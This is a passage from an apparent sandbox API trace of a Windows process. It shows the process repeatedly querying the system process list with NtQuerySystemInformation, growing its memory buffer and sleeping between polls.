RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.381] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.397] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.412] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.429] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.461] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.487] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.504] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.519] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.535] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.551] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.583] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.601] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.612] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.628] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.643] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.659] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.675] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.691] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.712] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.722] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0117.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0117.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0117.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0117.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0117.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0117.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0117.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 